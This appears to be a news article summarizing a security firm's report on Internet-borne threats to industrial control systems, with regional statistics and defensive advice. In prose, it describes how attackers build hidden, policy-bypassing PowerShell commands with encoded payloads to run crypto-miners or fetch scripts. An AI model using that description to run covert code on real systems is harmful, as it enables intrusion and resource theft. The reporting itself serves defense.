New findings from a leading cybersecurity firm’s Q1 2025 report have spotlighted a critical shift in the threat landscape facing Industrial Automation Systems (IAS).
The Internet, once a secondary attack vector, has now emerged as the primary source of malicious activity targeting industrial control infrastructures worldwide.
The gravity of this development is hard to overstate. Industrial systems from factories and power plants to water treatment facilities and transportation hubs form the backbone of modern society.
Their operation is increasingly dependent on connectivity for data flow, efficiency, and remote management.
However, this very connectivity is now being exploited by cyber attackers, exposing industrial processes to a breadth of sophisticated threats.
The report reveals that in Q1 2025, 21.9 percent of all ICS computers globally encountered at least one blocked Internet-based threat, with this figure climbing to nearly 30 percent in certain regions such as Africa and Southeast Asia.
The Internet-based attacks analyzed include connections to denylisted resources for command-and-control activities, malicious scripts, phishing pages, web-based cryptocurrency miners, and spyware.
Modern attackers utilize a mix of techniques, from fileless attacks leveraging PowerShell to the exploitation of browser vulnerabilities and more traditional phishing campaigns.
A key technical takeaway is that significant numbers of IAS assets are directly or indirectly exposed to the Internet via improper network segmentation, poorly configured firewalls, or a lack of application whitelisting.
Many industrial facilities are still running outdated software and operating systems, further compounding the risk.
Attackers are increasingly relying on fileless malware, often executed through legitimate tools like PowerShell.
This method allows malware to run in memory rather than leaving traces on disk, which makes detection by traditional antivirus products much more difficult.
For instance, a typical malicious PowerShell command uses WindowStyle Hidden and ExecutionPolicy Bypass flags with base64-encoded payloads to covertly launch crypto-miners or download additional malicious scripts.
Similarly, attackers abuse legitimate open-source mining software like XMRig or NBMiner to hijack computing resources in industrial environments, draining system capacity and creating overheating or performance instability.
- These attacks are complemented by phishing and malicious scripts distributed through seemingly innocent websites.
- These scripts are designed to harvest operator credentials, redirect users to drive-by download sites, or trigger further infections like ransomware or industrial-specific malware strains.
The technical sophistication is matched by the attackers’ persistence, with some campaigns tailored to blend in with typical network traffic to avoid detection.
Regional disparities in attack prevalence are striking. Africa leads the statistical chart, where nearly 30 percent of ICS endpoints reported Internet-borne threats, while Southeast Asia shows similar vulnerability rates.
These regions also report relatively high exposure to viruses and specialized industrial malware, including threats manipulating AutoCAD files critical for industrial design and operations.
Experts attribute this heightened risk to factors such as underinvestment in advanced cybersecurity tools, inadequate network segmentation between IT and OT environments, and low levels of cybersecurity awareness among operational staff.
In practice, a standard attack chain may begin with a phishing email or malicious URL, leading to an initial compromise via social engineering or malicious scripting.
Once access is gained, attackers deploy fileless malware or crypto-miners, often moving laterally within the network by harvesting credentials and targeting key ICS servers or SCADA management interfaces.
Persistent attackers may use stolen credentials to establish a foothold, exfiltrate data, or initiate disruptive attacks such as ransomware, demanding payment to restore crucial industrial operations.
Given the technical depth and evolving nature of the Internet threat landscape, several core defensive strategies are outlined.
Network segmentation must be rigorously enforced to separate corporate IT and critical OT environments, ensuring that industrial systems are not directly accessible from the broader Internet.
Organizations should deploy updated whitelisting and denylisting rules on all industrial firewalls and proxies, restrict unnecessary Internet access through strict application-layer controls, and monitor scripting activity on endpoints for anomalies.
Security awareness training remains vital, equipping operators and engineers with the skills to spot phishing and practice safe Internet habits.
Routine patching of ICS devices and underlying software should not be neglected.
In summary, the Internet now stands as the primary threat source for industrial automation environments, bringing with it complex attack techniques and rising risks.
As digital transformation accelerates and connectivity deepens, the need for layered, proactive cybersecurity defenses grows more urgent.
The report’s findings serve as a stark warning: defenders in critical infrastructure must prioritize Internet-borne threats to prevent future disruptions and safeguard essential industrial processes.
